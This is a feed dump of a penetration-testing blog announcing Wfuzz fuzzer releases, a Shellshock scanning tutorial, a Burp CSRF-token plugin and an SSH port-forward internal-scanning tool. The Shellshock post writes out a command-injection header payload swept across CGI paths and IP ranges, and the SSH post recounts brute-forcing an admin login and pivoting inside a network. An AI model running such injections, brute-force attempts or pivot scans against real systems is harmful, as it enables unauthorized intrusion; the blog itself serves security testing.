tag:blogger.com,1999:blog-6921014549873020749Thu, 05 Sep 2024 06:44:33 +0000toolsweb securityconferencemalwareinformation gatheringforensicshackingbooksbruteforcemetasploitwebappsOracleincident responsemetagoofilowaspsql injectionvulnerabilitywfuzzEcrimebacktrackcodingexploitsincidentmanagingnetworkingpcipentestingproxystrikepythonsocial networkswebslayerCUDAPenetration testanonymityblackhatburpbypasscheatsheetclickjackingclient sidecrisiscsrfdecodersdeliciousdesktopencodersezinesflashfuzzinggeeksmeterpreterosxpassword crackingphishingpostexploitationprefetchproductivityproxysalariesscannerscannerssecurity marketsourcesshsticky keystipstoorconutilmanvmwarewardialingweb serviceswindowswindows 7Security on the edgeEdge-security blog about Penetration testing, OSINT, security tools, and other interesting stuff.http://edge-security.blogspot.com/[email protected] (Christian Martorella)Blogger143125- tag:blogger.com,1999:blog-6921014549873020749.post-1409348523846730620Thu, 21 Sep 2017 20:01:00 +00002017-09-21T21:01:14.019+01:00Wfuzz 2.2.0 released<div dir="ltr" style="text-align: left;" trbidi="on">
I'm pleased to announce a new version of WFuzz!<br />
<br />
Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.<br />
<br />
A payload in Wfuzz is a source of data.<br />
<br />
This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex web security attacks in different web application components such as: parameters, authentication, forms, directories/files, headers, etc.<br />
<br />
Wfuzz has received a huge update. Version 2.2.0 introduces plenty of great new features. One of the biggest changes is that Wfuzz is now scriptable:<br />
<blockquote>
>>> import wfuzz<br />
>>> for r in wfuzz.get_payload(range(100)).fuzz(hl=[97], url="http://testphp.vulnweb.com/listproducts.php?cat=FUZZ"):<br />
... print r<br />
...<br />
00125: C=200 102 L 434 W 7011 Ch "1"<br />
00126: C=200 99 L 302 W 4442 Ch "2"<br />
<div style="background-color: white; color: #3e4349; font-family: "goudy old style", "minion pro", "bell mt", Georgia, "Hiragino Mincho Pro", serif; font-size: 17px; line-height: 1.4em; text-align: left;">
<span style="background-color: transparent;"></span></div>
</blockquote>
<div>
Additional command line interfaces to generate payloads and encoding strings are now available. Other great feature, is the improved filtering language and the ability to reuse previous results, for example, if you do not want to perform any request but just find some specific HTTP requests within a previous Burp (TM) session, you can use the wfpayload executable:</div>
<div>
<blockquote>
<div>
$ wfpayload -z burplog,a_burp_log.log --slice "params.get~'authtoken' and url.pstrip|u()"</div>
</blockquote>
</div>
<div>
<div style="line-height: 1.4em; text-align: left;">
<div>
The command above will return a unique list of HTTP requests including the authtoken parameter as a GET parameter. Authtoken is the parameter used by BEA WebLogic Commerce Servers (TM) as a CSRF token, and therefore it will return all the requests exposing the CSRF token in the URL.</div>
<br />
A big effort has been done on documenting all the available features, check http://wfuzz.readthedocs.io/.<br />
<br />
You can now install Wfuzz using pip and run it from any directory, you can even set up look up directories for your preferred word lists.<br />
<blockquote>
$ pip install wfuzz</blockquote>
Enjoy!</div>
</div>
</div>
http://edge-security.blogspot.com/2017/09/wfuzz-220-released.html[email protected] (Xavi Mendez)0
- tag:blogger.com,1999:blog-6921014549873020749.post-4074639398484139186Thu, 30 Oct 2014 10:00:00 +00002014-10-30T11:03:10.481+00:00wfuzzScan for shellshock with wfuzz<div dir="ltr" style="text-align: left;" trbidi="on">
In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everywhere, from Web, DHCP or SSH servers to mail servers. It does not have any sense to extend this post trying to rehash what this vulnerability is about or why it is an issue, as by now there are thousands of other posts and articles about the Bash “Shellshock” vulnerability, you only have to do a quick search on the Internet.<br />
<br />
The best way to test for the Shellshock vulnerability is to do a local check but if you are worried about your web server hosting a vulnerable /cgi-bin and you don't have shell access, there are plenty of free Shellshock on-line scanner tools such as:<br />
<ul style="text-align: left;">
<li>http://shellshock.brandonpotter.com/</li>
<li>http://bashsmash.ccsir.org/</li>
<li>http://www.shellshocktest.com/</li>
<li>...</li>
</ul>
Or tools like Qualys, Nessus, Nmap, Burp, Metasploit... and a bunch of "quick-and-dirty” scans using simple Perl or Python scripts.<br />
<br />
Of course, you can also use <a href="http://edge-security.blogspot.co.uk/2014/10/wfuzz-21-released.html">Wfuzz</a> to check for internal or external affected Web servers easily, by injecting a payload in the User-agent, Referer or Accept headers against well known CGI scripts as follows (since <a href="http://edge-security.blogspot.co.uk/2014/10/wfuzz-21-released.html" target="_blank">v2.1</a> --ss switch allows you to filter responses containing the specified regex):<br />
<blockquote>
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w cgis.txt http://localhost:8000/FUZZ <br />
****************************************<br />
* Wfuzz 2.1 - The Web Bruteforcer *<br />
****************************************<br />
<br />
Target: http://localhost:8000/FUZZ<br />
Total requests: 389<br />
<br />
==============================================<br />
ID Response Lines Word Chars Request <br />
==============================================<br />
<br />
00250: C=200 4 L 6 W 50 Ch "/cgi-bin/test.cgi"<br />
<br />
Total time: 0.725533<br />
Processed Requests: 389<br />
Filtered Requests: 388<br />
Requests/sec.: 536.1568</blockquote>
<div>
You can also scan various hosts by supplying a list of hostnames, for example:<br />
<blockquote>
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w hostslist.txt -w cgis.txt FUZZ/FUZ2Z</blockquote>
or by using an IP range (<a href="http://edge-security.blogspot.co.uk/2014/10/wfuzz-21-released.html">v2.1</a> allows you to use the -Z switch to ignore connection errors):<br />
<blockquote>
$ wfuzz.py -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -z range,0-255 -w cgis.txt -Z http://192.168.1.FUZZ/FUZ2Z</blockquote>
<br />
Happy hunting,</div>
</div>
http://edge-security.blogspot.com/2014/10/scan-for-shellshock-with-wfuzz.html[email protected] (Xavi Mendez)0
- tag:blogger.com,1999:blog-6921014549873020749.post-6714248845985258862Fri, 24 Oct 2014 10:37:00 +00002015-01-21T11:39:37.096+00:00bruteforceweb securitywebappswfuzzWfuzz 2.1 released !<div dir="ltr" style="text-align: left;" trbidi="on">
I'm pleased to announce a new version of WFuzz!<br />
<br />
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc.), bruteforce GET and POST parameters for checking different kind of injections, bruteforce forms parameters (User/Password), Fuzzing,etc.<br />
<br />
I have been working intermittently on this release since October 2011, being almost finished several times but always leaving it aside at the last moment due to work. A few weeks ago I decided to finish it whatever it took.<br />
<br />
This version is a major change from the previous releases as it is almost totally rewritten, leaving not much of the old wfuzz 1.4, hoping for the best.<br />
<br />
The biggest change is that wfuzz now supports plugins, so you can code your scripts and improve or modify the application's functionality. For example, there is a plugin that parses links within the HTTP response and these will be added to the fuzzing queue. Check below how a single word "a" generates 8 different requests:<br />
<br />
<br />
<blockquote>
$ python wfuzz.py --script=links -z list,a --follow http://localhost:8000/FUZZ<br />
********************************************************<br />
* Wfuzz 2.1 - The Web Bruteforcer *<br />
********************************************************<br />
<br />
Target: http://localhost:8000/FUZZ<br />
Total requests: 1<br />
<br />
===========================================<br />
ID Response Lines Word Chars Request <br />
===========================================<br />
00000: C=200 17 L 89 W 1481 Ch "a"<br />
|_ Plugin links enqueued 5 more requests (rlevel=1)<br />
00001: C=200 14 L 57 W 889 Ch "/a/b/"<br />
|_ Plugin links enqueued 2 more requests (rlevel=2)<br />
00002: C=200 4 L 25 W 177 Ch "/"<br />
00003: C=200 9 L 7 W 61 Ch "/a/test.html"<br />
00004: C=200 4 L 6 W 47 Ch "/a/test.js"<br />
00005: C=403 10 L 30 W 285 Ch "/icons/"<br />
00006: C=200 17 L 89 W 1481 Ch "/a/"<br />
00007: C=200 14 L 57 W 895 Ch "/a/b/c/"<br />
|_ Plugin links enqueued 1 more requests (rlevel=3)<br />
00008: C=200 13 L 46 W 716 Ch "/a/b/c/d/"</blockquote>
<br />
<div>
The project has been moved from <a href="http://code.google.com/hosting/moved?project=wfuzz" target="_blank">Google code</a> to <a href="https://github.com/xmendez/wfuzz" target="_blank">Github</a>. For a full list of the new features, check the <a href="https://github.com/xmendez/wfuzz/releases/tag/v2.1-beta" target="_blank">Wfuzz v2.1 changelog</a>.</div>
<div>
<br />
Download the latest version at:<br />
<ul style="text-align: left;">
<li><a href="https://github.com/xmendez/wfuzz/releases/" target="_blank">https://github.com/xmendez/wfuzz/releases/</a></li>
</ul>
</div>
</div>
http://edge-security.blogspot.com/2014/10/wfuzz-21-released.html[email protected] (Xavi Mendez)2
- tag:blogger.com,1999:blog-6921014549873020749.post-6031887050303658033Fri, 11 May 2012 09:05:00 +00002014-10-30T19:59:51.196+00:00burpcsrfweb securityTesting CSRF aware webapps with Burp<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Nowadays, is not uncommon to face websites protected using some variant of the synchronizer token pattern to mitigate the risk of Cross-Site Request Forgery (CSRF) attacks.<br />
<br />
The basic functioning of these webapps is to generate a random token submitted with each HTTP request, ensuring that the token is present and is valid for a given HTTP request.<br />
<br />
Below is shown an URL including its associated token:<br />
<br />
<blockquote class="tr_bq">
http://localhost:8080/injection_CSRF/inject.jsp?id=1&org.apache.catalina.filters.CSRF_NONCE=F22B0AC7234C98DFE11D665A3383B7E2</blockquote>
Although these protections help to mitigate effectively the risk of CSRF, they make almost impossible to analyse an application in an automatic or semi-automatic way, as this involves requesting an URL with a given token several times, which are discarded by the web server. Furthermore, a common action is to close the established HTTP session.<br />
<br />
The only way to request a URL several times is to re-generate the associated token. One possible way of doing this is using the <a href="http://en.wikipedia.org/wiki/HTTP_referer" target="_blank">referrer header</a> in order to go backwards identifying all the requests involved in the creation of the token and request them again in order to regenerate it.<br />
<br />
Shown below is an example where a user has to click through two menus in order to reach the "inject.jsp" page:<br />
<br />
<blockquote class="tr_bq">
<div style="text-align: left;">
</div>
<ol style="text-align: left;">
<li>http://localhost:8080/injection_CSRF/index,jsp</li>
<li>http://localhost:8080/injection_CSRF/index2.jsp?org.apache.catalina.filters.CSRF_NONCE=2AC1162C4CA176122F2BAA591B1F360E</li>
<li>http://localhost:8080/injection_CSRF/inject.jsp?id=1&org.apache.catalina.filters.CSRF_NONCE=1EB3952B5BB391C7936A862DF8940DF0</li>
</ol>
</blockquote>
In order to perform an automatic scan of the third request, the two previous requests must be performed sequentially as each of these requests contains a new generated token needed for the next request, forming a token chain.<br />
<br />
A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at <a href="http://code.google.com/p/pysqlin/downloads/list">https://github.com/xmendez/misc</a>. This plugin has been successfully tested against a simple vulnerable application using <a href="http://tomcat.apache.org/tomcat-6.0-doc/config/filter.html" target="_blank">tomcat CSRF protection</a> (all the requests in the token generation chain must be requested before testing a given URL).<br />
<br />
It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).<br />
<br /></div>
http://edge-security.blogspot.com/2012/05/testing-csrf-aware-webapps-with-burp.html[email protected] (Xavi Mendez)1
- tag:blogger.com,1999:blog-6921014549873020749.post-5020299705375817692Mon, 08 Aug 2011 09:44:00 +00002011-08-08T10:44:07.378+01:00Wfuzz 2.0 released!<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Hi All!</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">After Christian presentation at BlackHat/2011 Tools Arsenal, </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">I'm pleased to announce a new version of <b>WFuzz</b>! It is now more flexible, dynamic and extensible than ever!</span><br />
<div><br />
</div><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><strong>Wfuzz</strong> is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections, bruteforce Forms parameters (User/Password), Fuzzing,etc.</span></span></div><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></span></div><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Highlights in this version:</span></span></div><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; line-height: normal;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">- <u>Infinite payloads</u>. You can now define as many </span></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif; line-height: 16px;">FUZnZ words </span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">as you need </span></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif; line-height: 16px;">.</span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; line-height: normal;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif; line-height: 16px;">- <u>Multiple encoders</u> per payload. You can now define as many encoders as you need for each payload independently.</span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">- <u>Payload combination</u>. You can now combine your payloads in different ways by specifying </span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">iterators.</span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">- <u>Increased flexibility</u>. You can now define in an easy way new payloads, iterators, encoders and output handlers and they will be part of wfuzz straight away.</span></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">- <u>Baseline support.</u> You can now define a default value for each payload and compare the results against them.</span></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="line-height: normal;"></span></span></span><br />
<div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Other new features include:</span></span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><br />
</span></span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: large;"></span></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- New payloads</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- New encoders</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- Magictree output</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- Support for multiple proxies</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- Time delay between requests</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- Follow HTTP redirects</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- Fuzz within HTTP methods</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- HTTP HEAD scan</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">- SOCKS4/SOCKS5 support</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"><br />
</span></span></span></div><div style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-family: 'Times New Roman'; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;"></span><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif;">More detailed examples in the README and the google code project page !</span></span></span></div></div></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><br />
</span></span></div></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">Check it at </span></span><a href="http://code.google.com/p/wfuzz/">http://code.google.com/p/wfuzz/</a>!!</div><div><br />
</div><div><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial, Helvetica, sans-serif; line-height: 16px;">Stay tuned! We have a lot of improvements and ideas coming up!</span></div><div><br />
</div></div>http://edge-security.blogspot.com/2011/08/wfuzz-20-released.html[email protected] (Xavi Mendez)0
- tag:blogger.com,1999:blog-6921014549873020749.post-7055874201227175570Sun, 31 Jul 2011 16:07:00 +00002011-07-31T17:07:30.437+01:00blackhatBlackhat Arsenal USA<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgECdNG_bFUXFoJKbKvMuIk_TXAz0O5U3sE4RZSBCbHhtunmbIcjU4rEt3J1u5DYqOsHL_fvl0WXqCCSbmPlI37Opz1qvYTZcCxQYQC0FW7SimHXZ1j0kokku6M3JAjeRUV3jQlZNgDsGrR/s1600/bh11usa_728x90.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgECdNG_bFUXFoJKbKvMuIk_TXAz0O5U3sE4RZSBCbHhtunmbIcjU4rEt3J1u5DYqOsHL_fvl0WXqCCSbmPlI37Opz1qvYTZcCxQYQC0FW7SimHXZ1j0kokku6M3JAjeRUV3jQlZNgDsGrR/s640/bh11usa_728x90.png" width="500" /></a></div><br />
<br />
Hi all, we are proud to announce that we are going to present at Blackhat Arsenal USA 2011.<br />
<br />
We are presenting on Wednesday Wfuzz and Webslayer 2.0 and on Thurdsay theHarvester + Metagoofil 2.0! both days at 11:15hs.<br />
<br />
http://blackhat.com/html/bh-us-11/bh-us-11-arsenal.html<br />
<br />
If you want to say hello pass by our pod!<br />
<br />
See you there<br />
<br />
Edge-Securityhttp://edge-security.blogspot.com/2011/07/blackhat-arsenal-usa.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-2160447614065737067Wed, 22 Jun 2011 22:18:00 +00002011-06-22T23:36:21.236+01:00bruteforcescannersshScanning ports through SSH Port ForwardingIn one of the latest penetration tests we faced a SSH server that was based in Maverick SSHTOOLS.<br />
<br />
The funny thing is that this server was implemented by copy & pasting the example from the web, which had the Port forwarding feature enabled.<br />
<br />
After running a bruteforce attack, we found that the admin account had the "admin" password (strong password policy btw), but when we tried to login there was no shell, the server echoed everything we typed. So we went for the Port forwarding option, we forwarded some ports to interesting services like Terminal Server in the same machine and it worked, so then we though that would be great to be able to scan the internal network through this port forwarding feature, and that´s how we came up with this SSHscan tool.<br />
<br />
SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.<br />
<br />
This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.<br />
<br />
The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit. <br />
<br />
You can download the code here://code.google.com/p/edgessh <br />
<br />
Command line options:<br />
<br />
<span style="color: orange; font-size: x-small;"> -h: target host<br />
-u: username<br />
-p: password<br />
-l: targets lists to scan<br />
-t: threads<br />
--remote-host: host to scan<br />
--remote-ports: port list to scan<br />
--default-ports: scan default ports<br />
--all-ports: scan all 65535 ports<br />
--keep-tunnels: Forward all open ports<br />
<br />
Examples:<br />
<br />
scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt<br />
scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443<br />
scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports</span><br />
<br />
Enjoy Edge-Securityhttp://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html[email protected] (Christian Martorella)1
- tag:blogger.com,1999:blog-6921014549873020749.post-7869483676306751502Fri, 09 Jul 2010 20:15:00 +00002011-06-21T23:46:32.199+01:00owaspwebslayerOWASP VI Spain Meeting -2010: And still bruteforcing<a href="http://www.owasp.org/images/f/f5/Owasp-logo2.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" src="http://www.owasp.org/images/f/f5/Owasp-logo2.jpg" style="cursor: hand; cursor: pointer; float: right; height: 60px; margin: 0 0 10px 10px; width: 60px;" /></a><br />
<div style="text-align: right;"><span class="Apple-style-span" style="color: #0000ee;"><u><br />
</u></span></div><div style="text-align: justify;">Hi all, the past 19 of June i presented at OWASP VI Spain Meeting, a review of Bruteforce attacks in web applications, this is an old technique that is still useful for the attackers, and i showed with examples that is present in many attacks that affect big companies like Facebook, Yahoo, AT&T, Tuenti, etc. Also i presented the latest version of Webslayer a tool to perform all kind of bruteforce attacks in web applications. </div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">You can find the presentation here:</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">http://www.owasp.org/images/2/2a/Bruteforce2010.key.pdf</div><div><br />
</div><div>And also the video of the talk (spanish) <a href="http://www.poisonclub.com.ar/2010/06/30/resumen-y-contenido-multimedia-de-vi-owasp-spain-chapter-meeting-barcelona-2010/">here</a>.</div><div><br />
</div><div>Here is a picture of the conference showing the Webslayer results interface:</div><div><br />
</div><a href="http://www.owasp.org/images/2/24/Spain_20100618_19_G.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" src="http://www.owasp.org/images/2/24/Spain_20100618_19_G.JPG" style="display: block; height: 400px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 500px;" /></a><br />
